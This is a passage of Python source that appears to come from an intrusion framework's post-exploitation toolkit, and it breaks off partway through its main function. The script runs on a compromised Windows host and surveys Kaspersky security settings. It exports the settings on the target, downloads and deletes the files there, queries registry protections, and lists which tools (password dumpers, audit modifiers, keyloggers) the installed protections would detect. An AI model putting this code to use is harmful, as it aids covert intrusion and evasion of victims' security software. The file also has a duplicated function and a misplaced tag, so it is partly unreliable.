def outputBinData(regLabel, regValue, kasXmlFilePtr):
kasXmlFilePtr.write((('\t<setting>\n\t\t<setting_name>' + regLabel) + '</setting_name>\n'))
regLabel = shared.padOutput(30, regLabel)
if (regValue == '1'):
outputVal = 'ENABLED'
elif (regValue == '0'):
outputVal = 'DISABLED'
else:
outputVal = 'UNKNOWN'
shared.safePrint(('| %s | %s | %s' % (regLabel, regValue, outputVal)))
kasXmlFilePtr.write((('\t\t<setting_value>' + outputVal) + '</setting_value>\n\t</setting>\n'))
def outputBinData(regLabel, regValue, kasXmlFilePtr):
kasXmlFilePtr.write((('\t<setting>\n\t\t<setting_name>' + regLabel) + '</setting_name>\n'))
regLabel = shared.padOutput(30, regLabel)
if (regValue == '1'):
outputVal = 'ENABLED'
elif (regValue == '0'):
outputVal = 'DISABLED'
else:
outputVal = 'UNKNOWN'
shared.safePrint(('| %s | %s | %s' % (regLabel, regValue, outputVal)))
kasXmlFilePtr.write((('\t\t<setting_value>' + outputVal) + '</setting_value>\n\t</setting>\n'))
def kasVerEleven(kasName, kasDescription, kasVersion, kasRoot):
if re.match('.*ANTI.*', kasName.upper()):
shared.safePrint(
'| IT APPEARS TO BE ANTI-VIRUS ONLY... YOU DO NOT NEED ME.')
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
kasFlavor = 'ANTIVIRUS'
else:
kasFlavor = 'SECURITY'
logDir = dsz.lp.GetLogsDirectory()
copyCmd = 'cmd /C copy '
kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
shared.safePrint(
'| THIS NEW VERSION OF THE KASPERSKY 2011 SCRIPT USES DATA RETRIEVED FROM THE'
)
shared.safePrint(
'| ACTUAL KASPERSKY PROCESS; IT DOES NOT QUERY THE REGISTRY ANYMORE.'
)
shared.safePrint(
'| THIS MEANS THAT WE WILL CREATE FOUR FILES ON TARGET, DOWNLOAD THEM, AND DELETE'
)
shared.safePrint(
'| THEM. PLEASE ENSURE THAT THE SCRIPT REMOVES THESE FILES CORRECTLY.'
)
shared.safePrint(
'| GENERALLY SPEAKING, THESE FILES COMBINED ARE TYPICALLY LESS THAN 500K.'
)
shared.safePrint(
'| IF THERE IS A GOOD REASON NOT TO CREATE AND DOWNLOAD THESE FILES, PLEASE'
)
shared.safePrint(
'| QUIT OUT OF THIS SCRIPT AND MANUALLY CHECK REGISTRY SETTINGS.'
)
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
shared.safePrint(
'| ***** NEW FOR VERSION 2011 ****')
shared.safePrint(
'| KASPERSKY 2011 DOES NOT ALLOW FOR THE SIMPLE EXFIL OF DATA TO A SINGLE FILE.'
)
shared.safePrint(
'| AS SUCH, WE MUST CREATE 4 FILES ON TARGET (2xTXT 2xDAT), RETRIEVE THEM,'
)
shared.safePrint(
'| CONCATENATE THEM LOCALLY, AND FINALLY, PARSE THEM.')
shared.safePrint(
'| THIS IS NOT A QUICK PROCESS AND WILL LIKELY TAKE ~5-10 MINUTES.'
)
shared.safePrint(
'| ***** PATIENCE IS A VIRTUE *****')
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
dsz.ui.Pause(
'DO YOU WISH TO CONTINUE AND CREATE/GET THE KASPERSKY SETTINGS FILES? (REQUIRED TO CONTINUE)'
)
(tarWinDir, tarSysDir) = dsz.path.windows.GetSystemPaths()
tarTempDir = (tarWinDir + '\\temp')
kasOutFile = ''
exportType = ''
dsz.control.echo.Off()
tempFileName = (logDir + '\\kastemp.txt')
devNull = ''
tempCmd = (('local run -command "cmd /C type NUL > ' + tempFileName) +
'" -redirect')
dsz.cmd.Run(tempCmd)
for i in range(4):
if (i == 0):
exportType = 'rtp'
if (i == 2):
exportType = 'fw'
if ((i % 2) == 0):
kasOutFile = '~klset.txt'
else:
kasOutFile = '~klset.dat'
if dsz.file.Exists(kasOutFile, tarTempDir):
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
shared.safePrint(
('|\t!!!FILE %s\\%s MAY ALREADY EXIST ON TARGET!!!' %
(tarTempDir, kasOutFile)))
shared.safePrint(
'|\t!!!SEEK HELP IMMEDIATELY!!! !!!BAILING FROM SCRIPT!!!'
)
shared.safePrint('|\t!!!SEE BELOW DIR COMMAND OUTPUT!!!')
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') + kasOutFile))
return False
else:
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
shared.safePrint(
('| CREATING FILE %d OF 4 ON TARGET....' % (i + 1)))
if dsz.cmd.Run((((((
((('run -command "\\"' + kasRoot) + '\\avp.com\\" export ')
+ exportType) + ' \\"') + tarTempDir) + '\\') +
kasOutFile) + '\\"" -redirect')):
shared.safePrint(
('| SUCCESSFULLY CREATED %s\\%s ON TARGET' %
(tarTempDir, kasOutFile)))
dsz.cmd.Run(((('foreground get ' + tarTempDir) + '\\') +
kasOutFile), dsz.RUN_FLAG_RECORD)
[getFile] = dsz.cmd.data.Get('filelocalname::localname',
dsz.TYPE_STRING)
if ((i % 2) == 0):
tempCmd = ((((
(('local run -command "cmd /C type ' + logDir) +
'\\GetFiles\\') + getFile) + ' >> ') + tempFileName) +
'" -redirect')
dsz.cmd.Run(tempCmd)
if dsz.cmd.Run(((('del ' + tarTempDir) + '\\') + kasOutFile)):
shared.safePrint(
('| SUCCESSFULLY DELETED %s\\%s ON TARGET' %
(tarTempDir, kasOutFile)))
if dsz.file.Exists(kasOutFile, tarTempDir):
shared.safePrint((
'PLEASE CHECK THE STATUS OF THE FILE %s\\%s ON TARGET!!!'
% (tarTempDir, kasOutFile)))
dsz.ui.Pause((
'!!! VERIFY THAT THE FILE %s\\%s IS NOT ON TARGET!!!'
% (tarTempDir, kasOutFile)))
else:
shared.safePrint((
'| VERIFIED DELETION OF FILE %s\\%s FROM TARGET'
% (tarTempDir, kasOutFile)))
if (dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') +
kasOutFile)) == 0):
shared.safePrint('| DIRECTORY LISTING FAILED')
else:
shared.safePrint(
('FAILED TO DELETE %s FROM TARGET' % kasOutFile))
dsz.ui.Pause(
('!!! VERIFY THAT THE FILE %s/%s IS NOT ON TARGET!!!' %
(tarTempDir, kasOutFile)))
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
dsz.ui.Pause(
'PLEASE CHECK THE ABOVE OUTPUTS TO ENSURE ALL FILES WERE DELETED.')
try:
kasXmlFilePtr.write('<kaspersky_settings>\n')
kasXmlFilePtr.write('<vendor>KASPERSKY</vendor>\n')
kasXmlFilePtr.write(
(('<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
kasXmlFilePtr.write((('<description>' + shared.xmlScrub(kasName)) +
'</description>\n'))
kasXmlFilePtr.write(
(('<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
shared.safePrint(('| ATTEMPTING TO OPEN FILE: ' + tempFileName))
kasFilePtr = open(tempFileName)
swLevel = 0
fwLevel = 0
inRegGuard = 0
fireWallStatus = 'UNKNOWN'
allPortMonitoring = 'UNKNOWN'
fileSystemMonitor = 'UNKNOWN'
logRegEvents = 'UNKNOWN'
logNonCrit = 'UNKNOWN'
sysAccountWatch = 'UNKNOWN'
printFlag = False
try:
for line in kasFilePtr:
if re.match('.*[+] SW2.*', line):
swLevel = 1
if (re.match('.*enabled.*', line) and (swLevel == 1)):
if re.match('.*yes.*', line):
sysAccountWatch = 'ENABLED'
elif re.match('.*no.*', line):
sysAccountWatch = 'DISABLED'
kasXmlFilePtr.write(
(('<sys_acc_watch>' +
shared.xmlScrub(sysAccountWatch)) +
'</sys_acc_watch>\n'))
swLevel = 0
if re.match('.*LogFiles.*', line):
fileSystemMonitor = 'ENABLED'
if re.match('.*no.*', line):
fileSystemMonitor = 'DISABLED'
kasXmlFilePtr.write(
(('<file_sys_logging>' +
shared.xmlScrub(fileSystemMonitor)) +
'</file_sys_logging>\n'))
if re.match('.*LogReg.*', line):
logRegEvents = 'ENABLED'
if re.match('.*no.*', line):
logRegEvents = 'DISABLED'
kasXmlFilePtr.write((('<reg_event_logging>' +
shared.xmlScrub(logRegEvents)) +
'</reg_event_logging>\n'))
if re.match('.*FullReport.*', line):
logNonCrit = 'ENABLED'
if re.match('.*no.*', line):
logNonCrit = 'DISABLED'
kasXmlFilePtr.write((('<noncrit_event_logging>' +
shared.xmlScrub(logNonCrit)) +
'</noncrit_event_logging>\n'))
if re.match('.*[+].*Firewall.$.*', line):
fwLevel = 1
if ((1 == fwLevel) and re.match('.*enabled.*', line)):
if re.match('.*no.*', line):
fireWallStatus = 'DISABLED'
else:
fireWallStatus = 'ENABLED'
kasXmlFilePtr.write(
(('<firewall_status>' +
shared.xmlScrub(fireWallStatus)) +
'</firewall_status>\n'))
fwLevel = 0
if re.match('.*AllPorts.*', line):
if re.match('.*yes.*', line):
allPortMonitoring = 'ENABLED'
else:
allPortMonitoring = 'DISABLED'
if re.match('.*vRuleList_vcontent.*', line):
splitFw = line.split(' ')
fwActionBlock = splitFw[2]
m = re.match('.*?([0-9a-fA-F]{4}07268930.*0801816089).*?',
line)
if m:
fwRules = m.group(1)
shared.lateKasFw(fwRules, kasXmlFilePtr, fwActionBlock)
if re.match('.*[+].*Resource.$.*', line):
inRegGuard = 1
if (re.match('.*Childs_vcontent.*', line)
and (inRegGuard == 1)):
shared.lateKasRegRules(line, kasXmlFilePtr)
inRegGuard = 0
if re.match('.*4b4c41707054727573746564.*', line):
shared.lateKasAppRules(line, kasXmlFilePtr)
regGetGmd = ''
regGetCmd = 'registryquery -hive l -key SOFTWARE\\KasperskyLab\\protected\\AVP11\\profiles\\TrafficMonitor\\settings\\ -value Ports_vcontent'
dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
[regValue] = dsz.cmd.data.Get('key::value::value',
dsz.TYPE_STRING)
shared.lateKasPortMon(regValue, kasXmlFilePtr)
kasXmlFilePtr.write(
(('<allport_monitoring>' + allPortMonitoring) +
'</allport_monitoring>'))
shared.safePrint(
'+----------------------------------------------------------------------------------+'
)
shared.safePrint(
'| GENERAL PSP STATUS: |'
)
shared.safePrint(
'+----------------------------------------------------------------------------------+'
)
shared.safePrint(
('| FIREWALL IS: %s' %
fireWallStatus))
shared.safePrint(
('| PORT MONITORING ON ALL PORTS IS: %s' %
allPortMonitoring))
shared.safePrint(
('| FILE SYSTEM MONITORING: %s' %
fileSystemMonitor))
shared.safePrint(
('| SYSTEM ACCOUNT WATCHING IS: %s' %
sysAccountWatch))
shared.safePrint(
('| NON-CRITICAL EVENT LOGGING IS: %s' %
logNonCrit))
shared.safePrint(
('| LOGGING OF REGISTRY EVENTS IS: %s' %
logRegEvents))
shared.safePrint(
'+----------------------------------------------------------------------------------+'
)
finally:
kasFilePtr.close()
finally:
kasXmlFilePtr.write('</kaspersky_settings>\n')
kasXmlFilePtr.close()
return True
def kasVerSix(kasName, kasDescription, kasVersion, kasRoot):
doNotRun = '| YAK'
logDir = dsz.lp.GetLogsDirectory()
kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
kasXmlFilePtr.write('<kaspersky_settings>\n')
kasXmlFilePtr.write('\t<vendor>KASPERSKY</vendor>\n')
kasXmlFilePtr.write((('\t<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
kasXmlFilePtr.write((('\t<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
kasXmlFilePtr.write((('\t<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| THE SCRIPT HAS IDENTIFIED KASPERSKY VERSION 6 FOR WINDOWS WORKSTATIONS.')
shared.safePrint('| THIS VERSION OF THE KASPERSKY SCRIPT USES REGISTRY QUERIES, BUT IS ONLY')
shared.safePrint('| A QUICK AND DIRTY REVIEW OF THE SETTINGS.')
shared.safePrint('+------------------------------------+-------+------------------------------------')
dsz.control.echo.Off()
shared.safePrint(('| %s %s %s' % (shared.padOutput(30, 'SETTING'), '| VALUE', '| STATUS')))
shared.safePrint('+------------------------------------+-------+------------------------------------')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles -recursive'
if (not dsz.cmd.Run(regGetCmd)):
shared.safePrint('!!!RECURSIVE REGISTRY QUERY FAILED!!!')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking -value enabled'
regLabel = 'BEHAVIOR BLOCKING:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Anti_Hacker\\profiles\\fw -value enabled'
regLabel = 'FIREWALL STATUS:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Anti_Hacker\\profiles\\fw\\settings -value protectionlevel'
regValue = shared.basicRegquery(regGetCmd)
kasXmlFilePtr.write('\t<setting>\n\t\t<setting_name>Firewall Protection Level</setting_name>\n')
if (regValue == '1'):
shared.safePrint(('| FIREWALL PROTECTION: | %s | !!!HIGH SECURITY!!! (THIS IS BAD)' % regValue))
kasXmlFilePtr.write('\t\t<setting_value>High Security</setting_value>\n\t</setting>\n')
elif (regValue == '2'):
shared.safePrint(('| FIREWALL PROTECTION: | %s | !!!TRAINING MODE!!! (THIS IS BAD)' % regValue))
kasXmlFilePtr.write('\t\t<setting_value>Training Mode</setting_value>\n\t</setting>\n')
elif (regValue == '3'):
shared.safePrint(('| FIREWALL PROTECTION: | %s | LOW SECURITY' % regValue))
kasXmlFilePtr.write('\t\t<setting_value>Low Security</setting_value>\n\t</setting>\n')
elif (regValue == '4'):
shared.safePrint(('| FIREWALL PROTECTION: | %s | OFF' % regValue))
kasXmlFilePtr.write('\t\t<setting_value>off</setting_value>\n\t</setting>\n')
else:
kasXmlFilePtr.write('\t\t<setting_value>Unknown</setting_value>\n\t</setting>\n')
shared.safePrint(('FIREWALL PROTECTION: | %s | (!!!UNKNOWN!!!)' % regValue))
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings -value bWatchSystemAccount'
regLabel = 'SYSTEM ACCOUNT WATCHING:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings -value bBehaviourEnabled'
regLabel = 'APP ACTIVITY MONITOR:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings -value bRegMonitoring_Enabled'
regLabel = 'REGISTRY MONITOR:'
regValue = shared.basicRegquery(regGetCmd)
if (regValue == '1'):
doNotRun = (doNotRun + '\n| POKING HOLES IN THE FIREWALL')
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings\\Set\\0000 -value bEnabled'
regLabel = 'DANGEROUS BEHAVIOR MONITOR:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings\\Set\\0002 -value bEnabled'
regLabel = 'PROCESS INJECTION PROTECTION:'
regValue = shared.basicRegquery(regGetCmd)
if (regValue == '1'):
doNotRun = (doNotRun + '\n| RUNASCHILD, RUNASSYSTEM, PWDUMP, OR MODIFYAUDIT')
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings\\Set\\0003 -value bEnabled'
regLabel = 'PROCESS HIDING PROTECTION:'
regValue = shared.basicRegquery(regGetCmd)
if (regValue == '1'):
doNotRun = (doNotRun + '\n| HIDING PROCESSES')
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings\\Set\\0007 -value bEnabled'
regLabel = 'KEYLOGGER DETECTION:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Web_Monitoring\\profiles\\httpscan\\ -value enabled'
regLabel = 'HTTP PORT LOGGING:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\TrafficMonitor\\settings\\ -value DecodeSSL'
regLabel = 'DECODE SSL:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
shared.safePrint('+------------------------------------+-------+------------------------------------')
shared.safePrint('| PORT MONITORING:')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\TrafficMonitor\\settings\\def\\ports\\ -recursive'
if dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD):
regName = dsz.cmd.data.Get('key::value::name', dsz.TYPE_STRING)
regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
portValue = ''
portDesc = ''
portEnabled = ''
shared.safePrint('| +--------+----------------------+---------+')
shared.safePrint('| | PORT | DESCRIPTION |MONITORED|')
shared.safePrint('| +--------+----------------------+---------+')
kasXmlFilePtr.write('\t<monitored_ports>\n')
for i in range(len(regName)):
if (regName[i] == 'enabled'):
portValue = regValue[(i - 3)]
portDesc = regValue[(i - 2)]
if (regValue[i] == '1'):
portEnabled = 'TRUE'
kasXmlFilePtr.write((('\t\t<monitored_port>' + portValue) + '</monitored_port>\n'))
else:
portEnabled = 'FALSE'
for j in range(6):
if (len(portValue) < 6):
portValue = (portValue + ' ')
else:
break
for j in range(20):
if (len(portDesc) < 20):
portDesc = (portDesc + ' ')
else:
break
for j in range(7):
if (len(portEnabled) < 7):
portEnabled = (portEnabled + ' ')
else:
break
shared.safePrint(('| | %s | %s | %s |' % (portValue, portDesc, portEnabled)))
shared.safePrint('| +--------+----------------------+---------+')
shared.safePrint('+---------------------------------------------------------------------------------')
kasXmlFilePtr.write('\t</monitored_ports>\n')
kasXmlFilePtr.write('</kaspersky_settings>\n')
else:
shared.safePrint('PORT MONITORING REGISTRY QUERY FAILED')
shared.safePrint('| !!!WARNING!!! BASED ON THE ABOVE SETTINGS, DOING THE FOLLOWING WOULD BE STUPID:')
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint(doNotRun)
shared.safePrint('+---------------------------------------------------------------------------------')
return True
def kasVerSixMp4(kasName, kasDescription, kasVersion, kasRoot):
doNotRun = '| RUNNING PWDUMP OR MODIFYAUDIT IF YOU ARE AN EXECUTABLE'
logDir = dsz.lp.GetLogsDirectory()
kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
kasXmlFilePtr.write('<kaspersky_settings>\n')
kasXmlFilePtr.write('\t<vendor>KASPERSKY</vendor>\n')
kasXmlFilePtr.write((('\t<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
kasXmlFilePtr.write((('\t<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
kasXmlFilePtr.write((('\t<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| THE SCRIPT HAS IDENTIFIED KASPERSKY VERSION 6 FOR WINDOWS WORKSTATIONS MP4.')
shared.safePrint('| THIS VERSION OF THE KASPERSKY SCRIPT USES REGISTRY QUERIES, BUT IS ONLY')
shared.safePrint('| A QUICK AND DIRTY REVIEW OF THE SETTINGS.')
shared.safePrint('+---------------------------------------------------------------------------------')
dsz.control.echo.Off()
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles -recursive'
dsz.cmd.Run(regGetCmd)
shared.safePrint('+------------------------------------------+------------+------------+-----------+')
shared.safePrint((((((((('| ' + shared.padOutput(40, 'IDS RULE DESCRIPTION')) + ' | ') + shared.padOutput(10, 'STATUS')) + ' | ') + shared.padOutput(10, 'LOGGING')) + ' | ') + shared.padOutput(10, 'ACTION')) + '|'))
shared.safePrint('+------------------------------------------+------------+------------+-----------+')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\regguard2'
if shared.compRegQuery(regGetCmd, 'REGISTRY GUARD', kasXmlFilePtr):
doNotRun = (doNotRun + '\n| LISTENING ON TARGET PORTS\n| RUNNING HANDLE\n| UNINSTALLING YAK OR DARKSKYLINE')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0015'
if shared.compRegQuery(regGetCmd, 'SUSPICIOUS DNS REQUEST PROTECTION', kasXmlFilePtr):
doNotRun = (doNotRun + '\n| RUNNING NETMAP IF YOU ARE AN EXECUTABLE')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0000'
shared.compRegQuery(regGetCmd, 'P2P WORM PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0001'
shared.compRegQuery(regGetCmd, 'TROJAN PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0002'
if shared.compRegQuery(regGetCmd, 'KEY LOGGER PROTECTION', kasXmlFilePtr):
doNotRun = (doNotRun + '\n| RUNNING YAK')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0003'
shared.compRegQuery(regGetCmd, 'HIDDEN DRIVER PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0004'
shared.compRegQuery(regGetCmd, 'KERNEL MODIFICATION PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0005'
shared.compRegQuery(regGetCmd, 'HIDDEN OBJECT PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0006'
shared.compRegQuery(regGetCmd, 'HIDDEN PROCESS PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0008'
shared.compRegQuery(regGetCmd, 'FILE MODIFICATION PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0010'
shared.compRegQuery(regGetCmd, 'PROCESS INTRUSION PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0011'
shared.compRegQuery(regGetCmd, 'IO REDIRECTION PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0012'
shared.compRegQuery(regGetCmd, 'SUSPICIOUS REGISTRY ACCESS PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0013'
shared.compRegQuery(regGetCmd, 'DATA XFER USING TRUSTED APP PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0014'
shared.compRegQuery(regGetCmd, 'SUSPICIOUS SYSTEM ACTIVITY MONITOR', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0016'
shared.compRegQuery(regGetCmd, 'PROTECTED STORAGE ACCESS PROTECTION', kasXmlFilePtr)
shared.safePrint('+------------------------------------------+------------+------------+-----------+')
shared.safePrint('| FIREWALL SETTINGS')
shared.safePrint('+--------------------------------------------------------------------------------+')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\AVP80\\profiles\\Anti_Hacker\\profiles\\fw\\ -value enabled'
dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
if ('0' == regValue[0]):
shared.safePrint('| FIREWALL STATUS: DISABLED')
elif ('1' == regValue[0]):
shared.safePrint('| FIREWALL STATUS: ENABLED')
else:
shared.safePrint('| FIREWALL STATUS: UNKNOWN')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\AVP80\\profiles\\Anti_Hacker\\profiles\\fw\\settings -value protectionlevel'
dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
if (regValue[0] == '1'):
fwSetting = 'HIGH'
elif (regValue[0] == '2'):
fwSetting = 'TRAINING MODE'
elif (regValue[0] == '2'):
fwSetting = 'TRAINING MODE'
elif (regValue[0] == '3'):
fwSetting = 'LOW'
elif (regValue[0] == '4'):
fwSetting = 'OFF'
else:
fwSetting = 'UNKNOWN'
shared.safePrint(('| PROTECTION LEVEL: %s (%s)' % (fwSetting, regValue[0])))
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\TrafficMonitor\\settings\\Ports\\ -recursive'
dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
try:
regName = dsz.cmd.data.Get('key::value::name', dsz.TYPE_STRING)
regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
except:
regName = ''
regVal = ''
shared.safePrint('+--------------------------------------------------------------------------------+')
shared.safePrint('| !!!ERROR CHECKING TrafficMonitor (PORT) SETTINGS; PROCEED WITH CAUTION!!!')
shared.safePrint('+--------------------------------------------------------------------------------+')
portValue = ''
portDesc = ''
portEnabled = ''
shared.safePrint('| PORT MONITORING:')
shared.safePrint('| +--------+----------------------+---------+')
shared.safePrint('| | PORT | DESCRIPTION |MONITORED|')
shared.safePrint('| +--------+----------------------+---------+')
kasXmlFilePtr.write('\t<monitored_ports>\n')
for i in range(len(regName)):
if (regName[i] == 'Description'):
portValue = regValue[(i - 1)]
portDesc = regValue[i]
if (regValue[(i - 2)] == '1'):
portEnabled = 'TRUE'
kasXmlFilePtr.write((('\t\t<monitored_port>' + portValue) + '</monitored_port>\n'))
else:
portEnabled = 'FALSE'
for j in range(6):
if (len(portValue) < 6):
portValue = (portValue + ' ')
else:
break
for j in range(20):
if (len(portDesc) < 20):
portDesc = (portDesc + ' ')
else:
break
for j in range(7):
if (len(portEnabled) < 7):
portEnabled = (portEnabled + ' ')
else:
break
shared.safePrint(('| | %s | %s | %s |' % (portValue, portDesc, portEnabled)))
shared.safePrint('| +--------+----------------------+---------+')
shared.safePrint('+--------------------------------------------------------------------------------+')
kasXmlFilePtr.write('<kaspersky_settings>\n')
shared.safePrint('| !!!WARNING!!! BASED ON THE ABOVE SETTINGS, DOING THE FOLLOWING WOULD BE STUPID:')
shared.safePrint('+--------------------------------------------------------------------------------+')
shared.safePrint(doNotRun)
shared.safePrint('+--------------------------------------------------------------------------------+')
return True
def main():
scriptVer = '1.0.0.6'
logDir = dsz.lp.GetLogsDirectory()
sysPid = 0
usrPid = 0
kasName = 'UNKNOWN'
kasDescription = 'UNKNOWN'
kasVersion = 'UNKNOWN'
kasName = 'UNKNOWN'
kasDescription = 'UNKNOWN'
kasVersion = 'UNKNOWN'
kasType = 'UNKNOWN'
kasVerSplit = 'UNKNOWN'
kasSubVersion = 'UNKNOWN'
kasRoot = 'UNKNOWN'
kasSubVersion = 'UNKNOWN'
getFile = ''
isWorkstation = False
isInternetSec = False
dbFile = (logDir + '\\target.db')
con = sqlite3.connect(dbFile)
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT NAME, DESCRIPTION, VERSION from applications where DESCRIPTION LIKE '%kaspersky%'")
kasAppQuery = cur.fetchall()
cur.execute("SELECT NAME, USER, PID, PATH from processlist where NAME like '%avp.exe'")
kasProcQuery = cur.fetchall()
cur.close
con.close
logDir = dsz.lp.GetLogsDirectory()
kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
myProc = shared.myProc()
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| YOUR TARGET APPEARS TO BE RUNNING A KASPERSKYISH PSP!')
shared.safePrint('| FOLLOW WIKI GUIDELINES BASED ON VERSION AND TYPE LISTED BELOW!')
shared.safePrint(('| PLEASE REMEMBER YOUR PROCESS IS: ' + myProc))
